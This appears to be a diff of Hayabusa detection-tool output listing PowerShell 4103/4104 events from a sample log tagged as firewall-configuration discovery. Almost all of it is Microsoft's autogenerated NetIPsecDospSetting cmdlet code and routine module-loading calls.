$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $fa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 